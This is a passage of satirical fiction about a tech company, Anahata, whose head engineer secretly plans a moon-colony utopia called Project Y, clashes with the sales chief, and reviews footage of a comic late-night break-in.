Arsyen floated through the rest of the day. He walked taller down the corridors and lingered crossing the lawn, flicking his new white badge as he walked, no longer afraid of any passing engineer. He even tried his hand at firing a red badge–carrying newbie, which was even more delightful than he had anticipated.
At home that night, Arsyen cradled the badge in his hand and spoke to it of handmaidens and orphans and all the wonderful things he would one day do for his country. And also which video games he would buy.
Above the profile photo, Arsyen drew a pointy crown on his head in thick black marker.
It was just like being a real prince again.
Gregor Guntlag moved across his office in efficient strides, enjoying the precise cadence of his combat boots thumping against the floor. From crew cut to coccyx, his spine descended in a long, straight line that leaned forward, diagonal to the floor, as though in constant battle with gravity.
At the moment, however, Gregor’s problem was less physics than numbers. Ugly, unsettling numbers. While few people on the Anahata campus knew of its existence, Gregor’s top-secret Project Y was the only endeavor that now mattered at the company. Everything else was an afterthought; a blip in the company’s glorious ten-year history. Were the project to fail, it would mean the end of Anahata. A victory, on the other hand, would ensure the success of Anahata, the web, and all things good for decades to come. It would be Gregor’s finest achievement, the greatest project to which he had ever put his name. He could not allow it to fail.
Yet by the numbers, it was failing, and not for any of the predictable reasons that often plagued brilliant Anahata ideas — an inability to find willing commercial partners, or criticism that Anahata was violating some silly law. Such problems, governed as they were by ignorance and reactionaries, were far outside Gregor’s control. In fact, his current inability to limit these kinds of interference was one of the main reasons Gregor found Project Y so exhilarating. If it succeeded, he would be able to protect his engineers from the ignorant masses, letting them build and create their dreams unencumbered. There would be no more defections to Galt, no more debates in the media about Anahata’s relevance. Project Y would definitively establish Anahata as the most innovative company in the world, ever.
Gregor often found himself wondering what would have become of him had Anahata or Project Y existed in his early days as an engineer, when he first landed on the shores of Baltimore, fresh from the University of Liechtenstein, his head filled with ideas for space elevators and floating castles.
His first major undertaking tackled the many lies and inaccuracies on the internet by using software that automatically corrected inaccurate opinions, comments, and blog posts. But the service never found any mainstream appeal — as one venture capitalist told him, “The internet wasn’t built for facts.”
Next, he embarked on a project to replace the planet’s slavery cages (or zoos, as they were also known) with robotic animal sanctuaries. After four years of working out of his one-room apartment in San Diego, surviving on little more than instant noodles and bananas, Gregor was forced to admit defeat.
But it was there in San Diego, standing next to a dumpster, ready to trash his metal monkey parts, that he met Bobby Bonilo. The future Anahata founder tossed him a quarter, thinking Gregor was homeless. But then Bobby saw the wires sprouting from the monkey’s tail in Gregor’s hand, took in the faded computing slogan on his T-shirt, and in a split second seemed to understand all of Gregor’s dreams — and their crushing defeat at the cruel hand of pragmatism.
Bobby had been the first to recognize Gregor’s genius. “Humans cling to the past. They will work tirelessly to destroy the most important advances of society,” he had said. “As a visionary, you must know that your ideas are ahead of their time. They must only come to light when the world is ready for them — or when you have too much power to be stopped.”
Project Y was just that — beyond its time, beyond any earthly concept of innovation. By that measure alone it would have failed in a normal environment. But Anahata now had what Gregor then lacked: boundless capital, a deep pool of engineering talent, and the power of a large country. Moreover, there was no public opinion standing in the way of Y. Its secrecy had been closely guarded, and Gregor was determined to keep its existence quiet until it was too late to be stopped.
Instead, the hurdle Gregor now found before him was a far more potent nemesis: the devil himself, Niels Smeardon, breathing fire and online advertising in the path of Gregor’s engineering team.
Niels was the reason two Project Y product managers had come to Gregor’s office that afternoon.
“For the past week, we’ve literally been twiddling our thumbs,” one said. “Every step we take is blocked by sales. We go left, there they are. We go right, there they are.”
“And why can’t you dart around them?” said Gregor, annoyed by the metaphor and his part in it.
“For example, we’re ready to run a simulation of Y at Shanley Field. But sales has the field all booked up for the next six weeks with various internal conferences — ”
“Motivational Go! Fight! Sell! conferences. Conferences…with Powerpoint,” spat the other product manager.
“Also, we need to be able to turn off advertising in one part of the world to free up some servers for Y testing. It would just be a low-volume region that we’d turn off, like Eastern Africa, but sales refuses. I was told it was escalated to Niels and he stopped the whole thing, saying the entire world deserves to benefit from Anahata advertising and that under no condition should Eastern Africa not receive our glorious ads for even a single day.”
Gregor snorted. He looked out onto the field below his office, where a group of sales employees were playing rugby. These were the men who sold Anahata’s internet ads — pithy phrases and punchy slogans advertising cruise ships and cancer treatments. They believed in dress shirts and strip clubs and golf and triathlons. He was sure he could see Niels among them, dressed in one of his shiny custom jerseys, kicking up mud clods simply to remind the earth of his dominance.
“I will fix the Niels problem,” said Gregor, steadying his voice and watching Niels’ spiky blond hair attack the sky as he ran down the field. The two product managers would never have guessed that Gregor’s body was raging inside, his blood cells taking up arms, their spears pricking the subcutaneous layer of his skin, ready to fight.
“Anything else?” he asked, turning to the two men.
“Things are still very quiet in the rest of the engineering community. The distractions have worked really well.”
Gregor nodded. When planning Project Y, he and Bobby had devised a list of “distractions” — projects like Social Car and Genie — that if leaked would capture internal, public, and media attention and let the Y engineers continue to work in secrecy on the company’s big bet.
“Go back to work, and don’t worry about this anymore.”
The duo left smiling.
Gregor remained by the window, watching the field. To any other observer, Niels might have seemed the ultimate captain, rallying his team to the win, throwing slaps and high-fives. But it was all an act. Niels was a man willing to knock down anyone who got in his way. Gregor had kept Project Y a secret from him for this very reason. Niels would destroy it for the very fact that it was Gregor’s baby. And if Niels succeeded in sabotaging Y, it would be the end of everything.
The problem was that Gregor had no power over Niels. They were equals, if not in brain power, then at least according to Anahata’s organizational chart. Only Bobby could tell Niels what to do. And while Gregor and Bobby dreamed up the idea for Project Y together, the founder had since taken a step back, tasking Gregor with making it a reality. This would have been fine were it not for the fact that Bobby seemed to have a weird affection for Niels, never suggesting that he really liked the guy, but also taking care to protect him from Gregor. He had even heard that Bobby and Niels occasionally did yoga together.
Gregor paced his office, Niels’ gravelly voice and sales aphorisms trailing behind him: “With courage comes determination.” “Leadership is knowing when to lead.” “Those who win are those who win.” He caught sight again of Niels on the field, this time tripping an oncoming opponent, the stunned player falling to the ground. Niels was halfway down the field before the man could even lift his face from the dirt.
Gregor needed Bobby’s help to get past Niels for good. It wasn’t simply a matter of getting a server or access to the field. Gregor needed Niels out of the picture, completely won over to the idea of Y, or contained so that he couldn’t thwart it.
He opened his messenger service. Bobby had said he would be busy much of the day at a colonics retreat but in fact seemed to be online.
Gregor: We need to talk about Y. It’s behind schedule. There are roadblocks. Bobby: You should come to colonics retreat. Good for removing roadblocks. Gregor: These are sales roadblocks. Bobby: Flush out roadblocks. Gregor: Do I have your permission to do whatever it takes? Bobby: Small things cloud the big ideas, threaten rain. At retreat now. Can’t talk.
Bobby’s online indicator switched off.
Gregor sighed and leaned back in his chair. He stared out the window for a long time without moving, the sky above him clouding with dark thoughts.
The four leaders of Gregor’s “distractions” projects were all longtime Anahatis. Any one of them could be trusted to help recruit the army of engineers Bobby had requested.
Which is how Gregor ended up in one of the company parking lots, the key to a driverless car in his hand. Nose upturned, he held the car key several inches away from his body. He believed keys were an outdated method of accessing one’s property, which was why he had an engineering team working on a simple identification solution that would require just a small incision in an individual’s pinky.
Gregor unlocked the door and settled into the front seat.
An unfamiliar beep boop beep came from the dashboard, and five red lights flashed in the center console as the Social Car software booted up. Soon, the dashboard glowed Hal-like in the early light of evening.
“Welcome to Social Car,” a female voice said. The dashboard flashed again, and Gregor was presented with a series of options on a large screen in the center console:
I want to meet… - man [specify age] - woman [specify age] - programmer [specify which languages] - designer - venture capitalist - engineers - other
Why would he want to meet someone?
“Other,” Gregor muttered.
Two faces, numbered “1” and “2,” popped up on the screen. Gregor didn’t recognize them but assumed they were the pictures of Social Car team members.
“Number 1,” he said.
“Sven Svensson is a quarter-mile away,” the voice said. “Shall I read you his profile?”
Gregor had no interest in getting to know his employees. The better he knew them, the harder it was to eventually fire them.
“Just drive me to Technology Way.”
“Driving to Technology Way,” the woman’s voice confirmed.
After yielding to two other cars, Anahata’s driverless car made its way out of the parking lot.
“There are three people near you now,” the voice said as the car turned on to Processor Street.
Gregor’s eyes flicked to the dashboard. Now a third, more familiar face stared back at him. He recognized Roni Herman, the team lead. Roni was a bit past his prime, already in his early thirties, but still a well-liked figure on campus. In reviewing the distraction projects and their leaders that morning, Gregor had thought Roni could be an interesting candidate to join the Project Y team.
“Take me to Roni Herman.”
The software beeped its assent, and a few minutes later, Gregor’s car pulled alongside Roni’s.
“Speak to Roni,” Gregor said. The dashboard beeped and a moment later confirmed that Roni had accepted the communication.
“Hello, Gregor, hello!” Roni’s eager, nasal voice filled Gregor’s car. “How do you like Pad Thai?”
“What?” Gregor never ate Thai food. He didn’t like the feeling of spice running through his body, raising his body temperature.
“You know, Pad…Thai,” Roni repeated. Gregor glanced over at Roni’s car, which was keeping perfect pace with his own. Roni climbed into the back of his car, searching for something. A moment later, he put a piece of paper against the window. On it was written in big black letters: “PAD THAI=SOCIAL CAR CODE NAME.”
“What would happen if I were to pull you off Social Car?” Gregor asked.
Roni didn’t answer immediately. Although Gregor refused to make eye contact, he imagined Roni was panicking, afraid he was about to be kicked off his project. Although Gregor volunteered at a community garden, gave millions each year to humanitarian crisis organizations, and voted only for socialists, he did like to cause a bit of microsuffering now and then. He felt it kept the engineers on their toes.
“Oh, well, you know, I don’t know how things would go if I came off it,” said Roni, the panic painted across his face in bold pinkish strokes. “I’ve really led the team from the start and — ”
Gregor frowned. In a company where sales strutted with their chins to the clouds, Gregor preferred the men who slouched. Roni could at least display a bit of faux humility.
“Slow down,” Gregor told his car. He’d ditch Roni and go talk to the Genie team lead instead.
But Roni’s car slowed to keep pace with Gregor’s.
“Pretty great, right?” Roni said. “That’s the speed-detection system we built this week. You can try to slow down, but my car will slow with yours so we can keep chatting. We’ve still got some bugs to work out, but I’m confident we’ll launch before the end of the quarter.”
What?!
The end of the quarter was far too soon for a Social Car launch. Gregor needed all of his distractions running up until Project Y was ready. He couldn’t kill this project — it was too well known and popular on campus — but he certainly couldn’t let it launch anytime soon. He needed to slow it down — like by removing Roni from Social Car and making him his Y evangelist. Gregor inhaled deeply.
“Have you heard of Project Y?” he asked.
Roni gasped. “I’ve heard…things, you know, but not all the details.”
“It’s our best shot at building the world’s greatest company. And the most important thing right now is for us to have strong leaders. People who can motivate others. People who can help articulate a vision.”
Out of the corner of his eye, Gregor saw Roni bouncing in his seat. “At many times during my career I’ve shown leadership and created visions and — ”
“Your vision isn’t required,” Gregor said. “What you’ll need to do is spread the word, win people over, recruit new team members — and eventually spread the project to all of Anahata’s engineers.”
“I organize the quarterly hackathon,” Roni said. “We now have 2,000 Anahata engineers around the world who code the entire weekend over a livestream feed in exchange for beer.”
“That’s what we’re looking for,” Gregor said. “It’s a big job. It’s historic. I need you to move over to Building 1 ASAP.”
“Building 1? Oh, yes! I won’t let you down!”
Gregor gave a small nod from his car.
“Oh, oh, one thing,” Roni said. “What do you want me to do about Pad Thai? Will you find a new leader for it?”
“I’ll find someone new. Don’t tell anyone where you are going or what you are working on.”
“I’ll get going right away!” Roni waved as his car turned and sped back toward campus. Soon he disappeared from Gregor’s dashboard altogether.
“Take me to Innovation Drive,” Gregor told his car.
As the car reversed course, Gregor contemplated how best to hinder Social Car. Putting a new technical lead on the project would undoubtedly slow it down. But he needed to throw a real wrench in the works, not simply lose a few weeks’ time as someone new got up to speed.
Gregor continued to wrestle with the problem as his car made its way down El Camino Real, a street that stretched the length of Silicon Valley in an endless loop of Mexican restaurants (Casa Fiesta, Casa Grande, Casa Lupe), energy-efficient cars, and boxy computer stores. Gregor found the relentless monotony and disinterested aesthetics pleasing.
The car passed under a billboard for Mr. Fixit, a local computer-repair service. Gregor glanced up at the tongue-in-cheek, 1950s-style image of a desperate housewife ripping her hair out as a confident Mr. Fixit repaired her computer and saved the day.
Gregor rolled down the window and craned his neck to see the ad. He ordered his car to do a U-turn. The car drove past the sign again, and then once more.
By the time he passed the sign for the third time, Gregor had the answer to his problem.
“Take me back to Anahata,” he said, “and drop me off at the lobby.”
The next morning, Gregor found himself in a place he rarely visited: the campus security control room, in Building 28. Row after row of TV screens circled the room; below them, men in matching purple polo shirts manned a dashboard of flashing red lights.
It appeared high-tech, but the reality was more panopticon of the banal. On one screen, a sales employee pulled his Porsche into the Anahata parking lot, straightening his tie in the reflection of the car window. Above him, two women did yoga on the lawn. On another screen, an aerial shot captured cubicle after cubicle of workers staring at their computers.
The cameras recorded this routine and hundreds like it each day. It was a wonder that they could even keep their lenses open on alert given how mind-numbingly boring Anahata’s security scene was, particularly during the night shift. In the wee hours of morning, nothing went into Anahata and nothing came out — minus the occasional nocturnal engineer. Otherwise the place was locked down with the tightest security in the Valley. There hadn’t been an attempted theft in more than five years.
But that morning, there had been a break-in at Building 1 — the highest-security spot on Anahata’s campus — prompting Gregor to dash out of the management meeting and make a beeline for the security office.
Footage from three a.m. showed a man dressed entirely in black sneaking across the Building 1 parking lot, hovering on tiptoe like a thuggish ballerina. He jumped behind a tree, rolled through the grass, and ended up at the building’s side entrance, where he pulled out an Anahata badge that had likely been swiped from a negligent engineer.
The man again raised the stolen badge to the access control reader, and for a second, the camera caught a shot of his face. He was Caucasian but looked more like a zebra, with black zigzags painted across his face.
Inside, he went past the molecular lab, the welding shop, the hard-hat zone, and the physical and intangible infrastructure teams, and then stopped in front of another office.
The man darted his flashlight around the room, splashing the walls with light. It was difficult to make out what he was doing, but from the shadows it seemed he had stopped in front of a desk and was pulling something out of his bag. The flashlight swung again. Suddenly, the scene was illuminated: The man was plugging a computer into a wall outlet.
“Galt!” Gregor gasped. This was nothing less than corporate espionage. The thief was going to plant something — maybe surveillance equipment or tampered data — then use it to gain access to all of Anahata’s network.
Then the thief sat down and put his feet up on the desk.
“Wait…what is he doing?” asked Gregor, crouching to put himself at eye level with the screen.
“Sir, after watching this many times, I’ve come to the conclusion that he is picking his nose,” said one of the guards, freezing the tape for a moment to show the faint outline of a finger moving toward the man’s face.
“What?” Gregor drew even closer, his face now just inches from the screen. He signaled to the guard to continue the footage.
The thief jumped up from the chair and turned off his flashlight. Within thirty seconds, he had crept out the back exit, barrel-rolled across the parking lot, unlocked a car, and driven off. One of the guards rewound the footage and froze it on the last full shot of the man’s face, little more than a black-and-white blur.
Although the security team had already watched the tape thirty times that morning, their collective adrenaline rose as they watched Gregor’s face for a reaction. They hadn’t seen this much excitement since an engineer’s pet boa had gotten loose on campus the previous month.
“Whose badge did he use to break in?” Gregor said finally.
The security head double-checked a pad of paper on the desk. “Someone named Roni Herman, who works in Building 7. As of yesterday, Roni Herman’s badge was cleared for access to Building 1. The perpetrator was probably tracking Roni the whole time, somehow got hold of his badge, and then got access to both buildings. This was probably the result of months of tracking and shadowing his movements. Should we call the police?”
Gregor stared at the face frozen on the screen, a black zigzag casting a lightning bolt from the man’s forehead to his neck. “Idiot,” he muttered, staring at Roni’s face on the screen.
Gregor stood.
“Idiots,” he said loudly, looking at the security team. “There is no need to call anyone.”
He turned on his heel and clomped out the door.
The security team looked at each other and shrugged.
“Man, I will never understand engineers,” said one, shaking his head before switching his attention to the cameras trained on the well-endowed girls in the customer support department.
Niels began each day with a run. The Northern California air was just crisp enough to feel clean and pure, and the occasional headwind produced a surmountable challenge — the kind of easy and achievable goal-setting that Niels liked for warming up to his workday. He followed his workout with a long shower, the rainforest setting gently splattering purified water on his head while a speaker piped in a soothing recording of a woman’s voice appraising each inch of his body.
Your muscles are so big.
Your abs are very flat.
Your Adam’s apple is prominent but tasteful.
But that morning, Niels could focus only on Gregor Guntlag. The overly German German had hated him since day one and seemed intent on turning Bobby against him.
Bobby and Gregor were both nutjobs as far as Niels was concerned, but he was used to working with crazies. Fifteen years of working in the Valley and he had never worked for a CEO or founder who wasn’t a sociopath or narcissist. They thought the world’s problems existed in part to keep them intellectually stimulated, and that all those problems — malaria, corruption, congressional deadlock, death, you name it — could be solved by technologists. Their lack of focus was confused for genius. One moment they would be asking the entire company to dramatically change course, and the next moment they’d be giving equal attention to the color of the lampshades in the lobby. And despite their staunch atheism, they all believed their success was somehow mythically predestined.
It was an absurd worldview, but one that Niels admired for its selfishness. Managing and manipulating these egomaniacs was an art he felt he had perfected.
With persistence and patience, Niels had worked on Bobby for six years, helping him understand that Anahata needed money to be successful and that Niels was the best lever he had to produce it in large quantities. As a result, Bobby generally left him alone. Gregor, on the other hand, had been less susceptible to Niels’ charm. He did everything he could to sabotage Niels, always playing the contrarian in any management meeting and sending out his engineering lackeys to turn off a sales production task here and there. It was nothing sufficiently significant to warrant an outcry to Bobby, but just enough to annoy Niels and make clear that Gregor and his foot soldiers were behind the job.
So Niels was surprised by the peace offering that had appeared the previous night in the form of a blue chat bubble on his phone — a chat message asking Gregor to come over to “work things out and bury the hatchet.”
It was a shocking olive branch from Anahata’s head engineer, and in retrospect, Niels realized he should have taken a screenshot of their exchange. Unfortunately, since Anahata chats were not stored (the result of Gregor and Bobby’s joint paranoia about government surveillance), this historic exchange of civilities would have no record.
After an evening spent trying to discern Gregor’s motives, Niels had finally replied that, yes, of course he’d be happy to talk. But the whole thing smelled fishy. Perhaps Gregor wanted something that belonged to sales. If that was the case, it meant that Niels had already achieved Master Negotiator Rule #1: Always have the upper hand. (Viewing even the most casual encounters as an opportunity for personal gain was key to Niel’s life philosophy. An ex-girlfriend had once accused him of dealing with their relationship like a business negotiation. Niels said he didn’t understand how she could possibly think that anything in life was not a negotiation. He came away triumphant, although the woman did break up with him shortly thereafter.)
Niels was confident he could work the meeting to his advantage. In fact, this could be the opening he needed to get Gregor to agree to put ads on Moodify bracelets.
In any other company, the management team would have salivated over the Moodify bracelets, with one billion dollars in projected profit in the first year alone. But not Gregor Guntlag, whose perennial argument against anything Niels wanted was that it wouldn’t be good for Anahata users. Niels believed that not giving people advertisements was bad. If they didn’t know something existed, how could they know they needed it? Only advertising could tell people what they needed to need.
Typically, Bobby hadn’t even listened to the discussion. He caught just the tail end of Gregor’s rebuttal and seemed to defer the decision indefinitely with a wave of his hands. If you asked Niels, Bobby gave his head engineer far too much rope. Gregor was holding the company back from billions of additional revenue. And what did he do to make up for it? As far as Niels could tell, Gregor was simply there to execute Bobby’s big ideas. All of Gregor’s own projects had been massive failures. He was good at implementation but had no vision of his own.
Niels stepped out of the shower and surveyed himself in the bathroom mirror. He was forty-two but didn’t show a single gray hair or wrinkle. By almost any measure, he was the picture of excellence in aging. He gave a quick, indulgent flex of his muscle and a flash of bleached teeth. He remembered that the Anahata employee he banged a few weeks back had commented on his nice smile. He racked his brain for a split second, trying to remember her name. She was that sexy hippie receptionist who kept asking him for career advice as he tried to take her clothes off. Janine. Jane. Jennie. It didn’t matter. It was probably a bit stupid to hit on someone who worked at Anahata, but he wasn’t going to worry about it. He always could have her fired if things got uncomfortable. So far, he hadn’t even run into her on campus.
Niels threw on his favorite Prada slacks — the ones he wore to close a deal — and finished getting dressed for work. He took a final look in the mirror and flashed his teeth. Never underestimate the power of a killer grin.
Master Negotiator Rule #36: Arriving a few minutes late to a meeting communicates dominance. You will wait for me. Punctuality is for the meek.
And so, despite having changed his outfit three times — should he go business casual? slouchy engineer? weekend triathlete? — then having spent two hours circling Gregor’s neighborhood, Niels made sure not to appear at Gregor’s doorstep even a minute early.
Three minutes after the appointed time, Niels arrived at the address and did a double take. He checked the house number again: 414 Tuscany Drive. This was it.
Before him was an immense silver gate — the kind of gate that only the truly rich, and truly paranoid, possessed.
Niels pushed a button on the intercom. Someone picked up, but instead of a “hello” there was simply a buzzing sound, followed by the slow opening of the gate, revealing a long driveway abutted by row after row of towering pines.
On some level, it made sense to Niels that Gregor would live in the wealthiest neighborhood in Atherton, itself the wealthiest city in the Valley. He was, after all, one of the earliest employees at Anahata and had made billions of dollars when the company went public. But Gregor was also the man who wore faded decades-old shirts every day, ate the same bland lentils at every lunch, and drove a beat-up Jeep to work. Niels had assumed he’d eschew a fancy house and live in austerity in a small condo in crime-ridden East Palo Alto, or perhaps an inconspicuous cottage in the slightly smelly, middle-class part of Mountain View. Anything but the estate that was emerging before Niels’ eyes — a sprawling mansion the style of which Niels could only describe as nouveau-chateau, and whose inhabitants Niels would ordinarily assume to be a transplanted Texas blonde and her bejeweled poodle.
The house was ostentation at its American best, its climbing spires and ornate Mediterranean palacio flourishes the odd manifestation of new money’s dream of old Europe. At the end of the driveway was a large marble fountain — six white swans spouting water onto a central lily pad. Rising up behind the fountain was a large marble staircase that led to the front door. Two long, peach-colored wings branched out from the entrance, each ending in a tall, Rapunzel-like tower.
Gregor was waiting for him at the top of the marble steps, dressed in his typical uniform of white T-shirt, khaki pants, and combat boots. In his hand he held two beers, one of which was immediately thrust at Niels, as if Gregor was following a textbook instruction on how to relate to American men. The beer was warm, likely pulled from the pantry just minutes before. Even if this was all just a plot to get something out of him, at least the guy was making an effort. And in any case, it was kind of fun to witness Gregor’s visible discomfort in his role as host.
If the garish exterior of Gregor’s palace had thrown Niels’ preconceptions, the interior only reaffirmed them. Once inside, Niels could see nothing in the house beyond white walls and a single overhead light in each room. The few windows in existence were so high up from the floor that they reminded Niels of a cathedral…or a prison. There was no artwork, no photographs, no sign of a woman, pet, plant, or any possible sign of life.
“You’re not one for decorating, are you?” said Niels, turning to Gregor with a smile designed to communicate friendliness.
“I like simplicity,” Gregor said. “I don’t really like…things.” The word lingered in the air between them.
“Except for an enormous house,” Niels smirked.
“I only bought a large house so as to have a strong fortress in the event of an anthropogenic risk,” Gregor replied.
“An anthropo-what?”
“Hostile artificial intelligence, nuclear holocaust, fossil energy exhaustion, the collapse of everything.”
“Ha ha…oh…”
Niels stifled his laugh; Gregor wasn’t kidding. The engineer’s face was as smooth as his walls, giving up nothing. He seemed to be staring at an imaginary spot just past Niels’ shoulder, avoiding eye contact.
“You like wine,” Gregor said.
“I do.”
“Fischer said you took him on a wine tasting in Napa a few years ago.”
“I didn’t know you liked wine,” Niels said. “I would’ve invited you along.”
“No, you wouldn’t have,” Gregor said. “And if you had, I would have said no. We aren’t friends.”
Niels coughed. Being a salesman, he wasn’t used to such direct displays of honesty.
Gregor’s eyes briefly flicked away from the wall, settling on Niels’ shoulders. “Do you want to see my wine cellar?”
Gregor led him down a white hall and through a massive, empty kitchen, at the far end of which was a wide, floor-to-ceiling steel door. Gregor pushed a button, and the door slowly slid into the wall, revealing a flight of stairs leading into darkness. In the seconds before their descent, Niels recalled an article he once read in a tech magazine, in which a successful Valley engineer kept a dungeon underneath his home, holding secret orgies while his nuclear family, clothed in matching pastel cottons, lived happily and unknowingly in the rooms upstairs.
But when Gregor turned on the lights, the illuminated space below revealed nothing more than a simple wine cellar, with row after row of bottle racks, and in the center, two chairs and a wooden table. Atop the table was a decanter filled with wine, and next to it, an empty bottle.
Instead of a toast, Gregor spent thirty minutes detailing each wine purchase in length: how much it had cost, what was said about the vintage, and when he was planning to open a particular bottle. He had built an elaborate wine management system that scanned the bottle’s label, then input each detail — including age, composition, and position in the wine cellar — into an algorithm that determined the ideal “drink date.” When the date approached, Gregor was sent a notification at two-week, one-week, day-of, and then hourly intervals, alerting him of the impending deadline.
“One time I received a notification while on a course of antibiotics,” said Gregor, leaning in just slightly and lowering his voice. “I had this bottle I needed to drink and was worried it was going to go bad. I had to save it until I was well again. It was very upsetting.”
“You don’t have to drink the bottle right that very same day. It’s not like milk.”
“But then I would get no benefit from such a complex system,” Gregor said.
He grabbed the bottle of wine from the wooden table and passed it to Niels, who let out a low whistle of appreciation. It was a Chateau Margaux — the holy grail of red wine. Niels couldn’t help but grin. He was going to crush his enemy at the negotiating table while trying one of the world’s most highly regarded wines.
Niels believed that learning to appreciate wine was an apprenticeship akin to golf — at first difficult to acquire, but then indispensable for business and generally agreeable as a pastime. And he had, in fact, come to love the taste of it. Chateau Margaux was a real bragging right, and he had never held its deep ruby on his tongue.
Niels sat down on an uncomfortable wooden chair. One of the spindles was split in the middle, and the raw edge pushed into his spine. He suspected Gregor had never been inside a home furnishings store in his life, that he didn’t see the inconsistency in offering up one of the world’s most expensive wines in such a dank and uncomfortable setting. For all his engineering brilliance, Gregor would never even have made it past the sales team’s entry-level “Hospitality & Negotiation” training course.
Gregor poured the wine from the decanter and handed a glass to Niels. The men studied the wine and took in the aroma, each eying the other over his glass.
But the deep tones of the Chateau Margaux transformed them. Niels loosened his tie, Gregor slouched just slightly in his chair. It was an exceptional wine. And after they took their first sip, Niels had the sudden realization that this was the first nondisagreeable experience the two had shared since Niels joined Anahata six years earlier. Gregor even tried to offer a slight smile, pushing it onto his face as though it were a heavy wooden beam. But at least he was trying.
Niels did not say a word — Master Negotiator Rule #33: Approach silence like a battlefield. He who speaks first shows his hand.
Niels sipped his wine slowly but decisively. He imagined his Adam’s apple bulging then receding, like a heaving warrior ready to break through enemy lines. A warrior with rippling abs and a weathered loincloth that barely covered his forceful manhood. He could crush this wine glass with just a slight clenching of his fingers. It would shatter at his feet, taking with it all of Gregor’s dreams and —
“Do you read any philosophy?” Gregor asked.
“Not really,” Niels said. “I mean, college, but that was a long time ago.”
“I thought so,” said Gregor.
Niels wanted to tell Gregor that he had graduated summa cum laude in economics from Yale, that he had been a Rhodes scholar, that he had won a Cambridge debate on the virtues of Adam Smith — but he held back. It was best to let the conversation advance smoothly toward the negotiation point.
“For centuries,” Gregor began, “people have tried to create the perfect society. To achieve what we see flickering on Plato’s cave. To transpose the ideal on our reality.”
Niels imagined Gregor sitting on his white couch, within his white walls, reading Greek philosophers after a hard day’s work.
“Many people have tried to create a community of like-minded individuals, with the aim of a peaceful and collaborative rule — a utopia, if you will. You may recall the Rappites…?”
Niels didn’t.
“Or the Oneida community.”
Again, Niels drew a blank.
“In any case,” Gregor said, “all of these attempts ultimately failed.”
“We weren’t made to live on communes,” Niels shrugged. “People are fundamentally selfish.”
“Or…perhaps it’s just a few bad seeds.”
“A few bad seeds are enough to ruin the crop.”
“Yes, Niels!” exclaimed Gregor, his chair rocking underneath him, a flush of pink invading his face. “That’s why we get rid of the bad seeds!”
Gregor took a deep breath, and the color was sucked back into his body. He coughed, then continued.
“We know how to do it. We know how to build the perfect society.”
“On campus?”
Gregor leaned forward in his chair, putting his hand awkwardly on Niels’ shoulder. In a sharp whisper, his eyes blazing, “Niels, we’re going to the moon!”
It took Niels a few seconds to realize what he had just heard. He moved to speak, but Gregor’s hand stopped him, his words spilling over his palm and rushing at Niels.
“We’ve figured out how to build the perfect society — and from all angles, from actual technical infrastructure to the societal structure. We’ve figured it all out!”
The Master Negotiator faltered and a laugh escaped from him, rudely punctuating Gregor’s plan. Niels couldn’t help himself — with just one simple, absurd phrase, six years of intimidation had evaporated. Gregor wasn’t anyone to be afraid of. He was simply insane. And that was surely to Niels’ advantage, though he knew one had to proceed carefully with crazy people. They could be unpredictable.
“Slow down,” Niels said. “Are you joking with me?”
“We have been working on the project for a year,” Gregor said. “Fifty engineers working in secret in Building 1. We’re building a colony on the moon.”
“You mean you have a spaceship and everything? How are you dealing with gravity? Wait, never mind, don’t answer that. What I mean is, since when did Anahata get into the business of humankind?”
“Anahata has always only ever been about humankind. Everything we do is done for — “
“Yeah, yeah, I know, everything we do is to improve humankind. But I mean, a society, Gregor. There are no synergies with our current business. How do you know how to construct a society?”
“Actually, a society is a lot like software. You build it on solid principles, then you iterate. Then you solutionize, and you iterate again.”
“What makes you think you can solve what centuries of wise men have failed to do?”
“Because we have something they don’t have,” Gregor said. He pushed his chair closer, and Niels couldn’t help but lean forward. The broken wooden spindle leaned with him, pushing into his back. But he did not move to swat it away; his eyes were locked on Gregor, their faces almost touching.
“Algorithms,” Gregor whispered.
“You have got to be kidding me,” Niels snorted. “These are humans we’re talking about, not robots. You can’t predict and control human behavior with algorithms.”
“That is an emotional reaction to what is a very logical project. And, yes, an algorithm could have predicted that you would respond that way. Even irrational behavior is rational when seen as a larger grouping of patterns. And as you can imagine, this project is built on patterns of success. Project Y, we call it. It will save Anahata — and, as a result, humankind.”
Niels shook his head. He had come to ask Gregor to slap some silly ads on a dumb bracelet; Gregor was telling him they were going to build a moon colony. If Gregor wasn’t crazy, then Niels was stupid for asking for so little in return.
“Let me get this straight. We’re wasting tons of company money for a totally altruistic endeavor? There’s not a single business purpose in all of this?”
“Obviously there’s a business purpose,” Gregor said. “That’s where it all started.”
Niels smirked — now they were speaking his language. The company always talked about saving the world, and sometimes really did believe in it, but Bobby always made sure there was a monetization element involved — and that Niels was in charge of ensuring the project’s economic success.
“Tell me more,” said Niels, leaning back in his uncomfortable chair.
“Project Y is fundamentally about protecting our employees and our company from outside threats,” Gregor said.
“So this is about beating Galt.”
“And any future Galt. We have the world’s best engineers, and if we lose them, we lose everything. But if we build them a utopia, they will never have any reason to leave.”
“Don’t you think the company’s already done a pretty good job of building a worker’s paradise?” Niels said. “If anything, we’ve made all these engineers into self-entitled, smoothie-guzzling cult members who will never have any reason to leave. Where else could they have job titles like ‘Evangelist,’ ‘Security Warrior,’ ‘Protector of All Things Internet,’ and ‘Debuggenator’?”
Gregor shook his head. “It isn’t enough anymore. Free food, massages, and light-saber aerobics were revolutionary when we first started the company. But nowadays, every startup has them. The smaller companies can offer faster career mobility, wider remit, and most important, by dint of being small and under the radar, they can innovate wildly through illegality. Just think — when was the last time we were able to get away with selling a user’s private data or violate someone’s copyright? Those golden days are gone. We simply can’t compete. And Galt knows it. Everyone knows it.”
Niels couldn’t disagree. Galt was a real threat, particularly in the Valley, where the average shelf life of even the most successful tech companies was just a decade or two. Anahata was already ten years old. Practically ancient.
“So, if you build a colony on the moon…”
“The better way to state it is, if we build an isolated utopia — which just happens to be on the moon — then we will secure the future of this company. No more Galt headhunters. No more Galt stealing our great ideas.”
“And you’ll just lock the employees up there on the moon? Give them a one-way ticket?”
“Imagine — a planet full of geniuses!”
Niels shook his head. “Surely there are easier ways to do this. What about raising employees’ salaries or giving them longer vacations? Going to the moon seems extreme. I see no value add to the company.”
“Value add?” Gregor sneered. “Your statement is not made true by its redundancy. There is indeed value. It’s only by tackling what seems impossible that you can ensure no one else will do it. Galt can compete with bigger salaries and fancy perks, but they won’t be able to compete with a moon colony. Plus, we’re building a utopia that no engineer will ever want to leave. We’ll be unstoppable! All other utopian societies have failed — it’s a big problem that no one’s solved. It’s a huge opportunity for us.”
